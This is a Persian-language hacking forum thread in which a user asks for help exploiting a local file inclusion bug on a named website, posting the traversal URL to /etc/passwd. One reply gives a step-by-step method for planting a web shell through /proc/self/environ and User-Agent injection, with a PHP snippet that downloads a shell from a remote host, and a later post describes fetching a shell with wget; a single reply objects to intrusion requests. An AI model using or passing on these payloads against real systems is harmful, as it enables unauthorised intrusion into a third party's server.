SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

سوال

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • سوال

    با سلام به همه دوستان این باگ lfi داره اما من هر کاری کردم نتونستم بزنمش
    کسی میتونه http://www.zeagle.com/index.php?filename=../../../../../../etc/passwd%00
    دوستان هر که زد فیلم آموزش یا تایپ بزنه....

  • #2
    RE: سوال

    سلام.
    قوانین تیم رو رعایت کنید.هر تاپیکی سر جای خودش و همچنین درخواست نفوذ و ....هم نداریم.
    خودتون شروع کنید و هک کنید.
    مسابقه نیست که فیلم آموزشی هم بخواد.

    نظر


    • #3
      RE: سوال

      همه جا هستی ....

      کی ذرخواست هک کردش گفتم بگین چه جوری میشه سایت رو با باگ lfi زد

      نظر


      • #4
        RE: سوال

        نوشته اصلی توسط fixxer
        با سلام به همه دوستان این باگ lfi داره اما من هر کاری کردم نتونستم بزنمش
        کسی میتونه http://www.zeagle.com/index.php?filename=../../../../../../etc/passwd%00
        دوستان هر که زد فیلم آموزش یا تایپ بزنه....

        با سلام دوست عزیز

        ابتدا قسمت proc/self/environ../../../../../../../../..

        را به آخر سایت اضافه کرده و دستوری مبنی بر در یافت دایرکتوری دریافت میکنید(اگر ارور در یافت کردید باید راه دیگری وارد عمل شوید)

        سپس به قسمت tools رفته و گزینه default user agent را انتخاب کنید (اگر این گزینه را ندارید آن را از گزینه

        tools/web develper/GetMoreTools دریافت کنید و سپس به قسمتedit user agant رفته و new را انتخاب کنید و کد زیر را در آن

        past کرده ونام آن را شل بگذارید

        [php]<?php [email protected]_get_contents("محل آپلود شل خود را بنویسید"); [email protected]("shell.php","w"); fputs ($fw, $shell); fclose($fw); ?>[/php]

        و سپس از قسمت default user agent گزینه shell را انتخاب کرده و پیج موجود را رفرش کنید ولرد شل خود خواهید شد!!
        [hr]
        ودر ضمن یادم رفت بگم که هر ساتی که دارای کدهای زیر نباشه ویا این که برروی کدهای زیر کنترلی نباشه یعنی مقدار دریافت ورودی

        کنترل نشده یاشه میشه اونو هکش کرد ولی در این سایت مقادیر کنترل میشوند

        اگر این مقادیر کنترل شده نبودند میتونستید با وارد کردن دستور

        www.zeagle.com/index.php?page=http://www.google.com

        بجای گوگل آدرس شلرتون .... به راحتی شل خودتونو آ| کنید اما در این سایت نمیتونید

        مقادیری که در سورس اصلی نباید وجود داشته باشند

        [php]1_$ include
        2_$_require
        3_$ include_once
        4_$require_once[/php]
        [align=center]همه انسان ها یک چیز را میبینند ولی این نوع دید است که انسان های متفاوت را میسازد[/align]

        [align=center]بدلیل امتحانات کم رنگیم ! [/align]

        نظر


        • #5
          RE: سوال

          اول جستجو کنید :

          [align=CENTER]
          local file include Upload Shell
          [/align]
          [align=center][/align]

          نظر


          • #6
            RE: سوال

            دوستان پرم ندارم environ رو باز کنم
            راستی یه راه دیگه هم هست اینه که رشلافه environ رو باز میکنیم tamper رو باز میکنیم بعد wget میزنیم به شل خودمنون
            حالا الان پرم ندارم چیکار کنم؟

            نظر

            صبر کنید ..
            X